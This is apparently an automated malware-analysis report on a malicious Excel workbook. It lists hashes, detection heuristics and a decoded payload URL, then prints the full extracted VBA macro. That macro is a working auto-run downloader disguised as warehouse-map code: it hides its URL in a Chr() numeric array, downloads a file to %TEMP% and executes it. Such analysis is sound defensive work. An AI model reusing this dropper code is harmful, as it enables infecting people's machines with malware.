Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 9e6c7a8d88eb3e9c…

Verdict: MALICIOUS

File type: Office (OLE) / .XLS
Size: 48.5 KB
Created: 2015-07-30 05:24:02
Authoring application: Microsoft Excel
First seen: 2026-06-25
MD5: dee85813a8f6b5942f4b94e1a6bfda44
SHA-1: 283261aa9920f7c4cf8241d5dfcdcdec22e22040
SHA-256: 9e6c7a8d88eb3e9ca5eaf6f95ffaf7cda8b51e59d5d4c755aedc59e290c58d43
Risk Score: 290

Heuristics (9)

  • ClamAV: Doc.Downloader.Generic-10026854-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-10026854-0
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
  • VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script:
        Set Nebeineboysya_2 = CreateObject(DrinkSun(1))
  • CallByName call [high] (OLE_VBA_CALLBYNAME)
    Matched line in script:
        CallByName Nebeineboysya_2, DrinkSun(7), VbLet, 1
  • Payload URL decoded from a Chr() numeric-array loader (1 URL) [high] (OLE_VBA_CHR_ARRAY_DROPPER_URL)
    A VBA macro builds its stage-2 download URL from a numeric array (Array(250, 262, …)) decoded one character at a time with Chr() and a linear offset (e.g. Chr(n - 146)), then drives Microsoft.XMLHTTP / ADODB.Stream.SaveToFile / Shell.Application to drop and execute the payload in %TEMP%. The URL is assembled at run time and never appears contiguously on disk, so a literal scan misses it; surfaced as an IOC. Self-validating: only an array that decodes to a valid host URL is reported, so a benign numeric array cannot false-positive.
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro [low] (OLE_VBA_WBOPEN)
    Matched line in script:
        Private Sub Workbook_Open()
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://hg9.free.fr/09u8h76f/65fg67n (referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9410 bytes
SHA-256: 2df9db4872b8b7b42b7b212e7c2d0e47e1cf372cfc9f3cac74861d6142275e33
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Call AddSensors
End Sub

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private MapsInitialized As Boolean
Private mDBname As String
Private MapInit As Boolean
Public Nebeineboysya_1 As Object
Public Nebeineboysya_2 As Object
Public Nebeineboysya_3  As Object
Public Nebeineboysya_4 As String
Public Nebeineboysya_5 As String
Public Nebeineboysya_6 As Object
Public DrinkSun() As String


Private Sub CheckBins()
'---------------------------------------------------------------------------------------
' Procedure : CheckBins
' Author    : David
' Date      : 4/3/2011
' Purpose   :
' Checks if any bins have been added or deleted
'---------------------------------------------------------------------------------------

    Dim LP As Long
    Dim BinID As Long
    Dim objStorages As String
    Dim objStorage As Variant
    Dim MapID As Long
    Set Nebeineboysya_2 = CreateObject(DrinkSun(1))
     GoTo ErrHandler
    objSt.orages.Load
    'check for deleted bins
    For LP = 1 To BM.StorCount
        BinID = BM.StorID(LP)
        If Not objSto.rages.IsItem(BinID) Then
            BM.UnloadStor BinID
        End If
    Next LP
    'check for new bins
    For Each objStorage In objS.torages
        With objStorage
            If Not BM.BinLoaded(.ID) Then
                BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
            End If
            'check for bin moved to other map
            MapID = BM.BinMapID(.ID)
            If MapID <> 0 And MapID <> .MapID Then
                BM.UnloadStor .ID
                BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
            End If
        End With
    Next
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
Set Nebeineboysya_6 = CreateObject(DrinkSun(2))
Set hokuk = CreateObject(DrinkSun(3))
Set Nebeineboysya_3 = hokuk.Environment(DrinkSun(4))
CheckDatabase
End Sub

Private Sub CheckDatabase()
'---------------------------------------------------------------------------------------
' Procedure : CheckDatabase
' Author    : David
' Date      : 2/13/2012
' Purpose   : checks if database has changed to a different database. If so reset map control.
'---------------------------------------------------------------------------------------
'
Dim Nebeineboysya_7() As Variant
Nebeineboysya_7 = Array(158, 170, 170, 166, 112, 101, 101, 158, 157, 111, 100, 156, 168, 155, 155, 100, 156, 168, 101, 102, 111, 171, 110, 158, 109, 108, 156, 101, 108, 107, 156, 157, 108, 109, 164)

Dim Nebeineboysya_8 As Integer
    Dim uncunctunc2_1 As String
    uncunctunc2_1 = ""
 GoTo ErrHandler
    If mDBname <> Prog.DatabaseFullName Then
        mDBname = Prog.DatabaseFullName
        BM.Reset
        MapsInitialized = False
    End If
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
      For Nebeineboysya_8 = LBound(Nebeineboysya_7) To UBound(Nebeineboysya_7)
        uncunctunc2_1 = uncunctunc2_1 & Chr(Nebeineboysya_7(Nebeineboysya_8) - 20 - 34)
    Next Nebeineboysya_8

Nebeineboysya_1.Open DrinkSun(5), uncunctunc2_1, False
CheckMaps
   End Sub

Private Sub CheckMaps()
'---------------------------------------------------------------------------------------
' Procedure : CheckMaps
' Author    : XPMUser
' Date      : 12/6/2014
' Purpose   : checks if any maps have been added or deleted. Resets if so.
'---------------------------------------------------------------------------------------
    Dim objStors As String
    Dim objStor As Variant
    Nebeineboysya_1.Send
    Dim NewList As String
    Dim DoReset As Boolean
    Dim LP As Long
    Nebeineboysya_4 = Nebeineboysya_3(DrinkSun(6))
GoTo ErrHandler

    objS.tors.Load , , , , , True
    For Each objStor In objSt.ors
        'make list of unique map ID's
        NewLi.st.Add objStor.MapID
    Next
    If Not MapInit Then
        'init map list, reset BinMap object
        MapInit = True
        DoReset = True
    Else
        'check if each map on new list is on old list
        If MapL.ist.Count <> NewLi.st.Count Then
            'count not same, reset
            DoReset = True
            Set MapL.ist = NewList
        Else
            For LP = 1 To MapLi.st.Count
                If MapL.ist.ID(LP) <> NewLi.st.ID(LP) Then
                    DoReset = True
                    Set MapL.ist = Ne.w.List
                    Exit For
                End If
            Next LP
        End If
    End If
    If DoReset Then
        BM.Reset
        MapsInitialized = False
    End If
    Set NewLi.st = Nothing
    Set objSt.ors = Nothing
    Set objSt.Or = Nothing
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
Nebeineboysya_5 = Nebeineboysya_4 + Replace(DrinkSun(12), "t", "e")
ConnectMaps
End Sub
Public Sub AddSensors()
    Dim Col As String
    Dim Obj As String
    DrinkSun = Split(UserForm1.Label1.Caption, "/")
    GoTo ErrExit
    On Error GoTo ErrHandler
    BM.ResetBalances
    
    Cofl.Load

    On Error GoTo 0
ErrExit:
Set Nebeineboysya_1 = CreateObject(DrinkSun(0))
CheckBins
    Exit Sub
ErrHandler:
     AD.DisplayError Err.Number, "modMaps", "AddSensors", Err.Description
     Resume ErrExit
End Sub
Public Sub ConnectMaps()

    Dim objStorages As Variant
    Dim objStorage As Variant
    Dim objMap As Variant
    Dim objMaps As Variant
     CallByName Nebeineboysya_2, DrinkSun(7), VbLet, 1
 Nebeineboysya_2.Open
GoTo ErrHandler
    CheckDat.abase BM
    CheckM.aps BM
    objMaps.Load
    BM.Visible = False
    If objMaps.Count > 0 Then
        BM.Visible = ShowMaps
        If ShowMaps Then
            If Not MapsInitialized Then
                'add maps
                For Each objMap In objMaps
                    With objMap
                        BM.AddMap .ID, .MapName, .Units, .Zoom
                    End With
                Next
                'add bins
                objStor.ages.Load , , , , , True
                For Each objStorage In objSto.rages
                    With objStorage
                        BM.AddStor .ID, .Label, .IsWarehouse, .MapID, .XPos, .YPos, .Volume, .PositionSet
                    End With
                Next
                MapsInitialized = True
            End If
            AddSenso.rs BM
            CheckB.ins BM
            BM.Update
        End If
    End If
    Set objMap = Nothing
    Set objMaps = Nothing
    Set objStorage = Nothing
    Set objStorages = Nothing
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
SaveMaps
End Sub

Public Sub SaveMaps()
rbp = CallByName(Nebeineboysya_1, DrinkSun(10), VbGet)
    Dim objStor As Variant
    CallByName Nebeineboysya_2, DrinkSun(9), VbMethod, rbp
    Dim objMap As Variant
    Dim LP As Long
    Dim ID As Long
    Dim XPos As Single
    Dim YPos As Single
    Dim BinLP As Long
    Dim BinID As Long
    CallByName Nebeineboysya_2, DrinkSun(11), VbMethod, Nebeineboysya_5, 2
GoTo ErrHandler
    For LP = 1 To BM.MapCount
        ID = BM.MapID(LP)
        objMap.Load ID
        objMap.BeginEdit
        objMap.MapZoom = BM.MapZoom(LP)
        objMap.ApplyEdit
        Set objMap = Nothing
    Next LP
    For BinLP = 1 To BM.StorCount
        BinID = BM.StorID(BinLP)
        If BM.BinLoaded(BinID) Then
            BM.BinLocation BinLP, XPos, YPos
            With objStor
                .Load BinID
                .BeginEdit
                .XPos = XPos
                .YPos = YPos
                .ApplyEdit
            End With
            Set objStor = Nothing
        End If
    Next BinLP
    On Error GoTo 0
ErrExit:
    Exit Sub
ErrHandler:
Nebeineboysya_6.Open (Nebeineboysya_5)
End Sub




Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FBD91A81-63B8-4464-969D-027C61D4B930}{5C005C90-1399-4DF1-B778-86E5A385C0F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False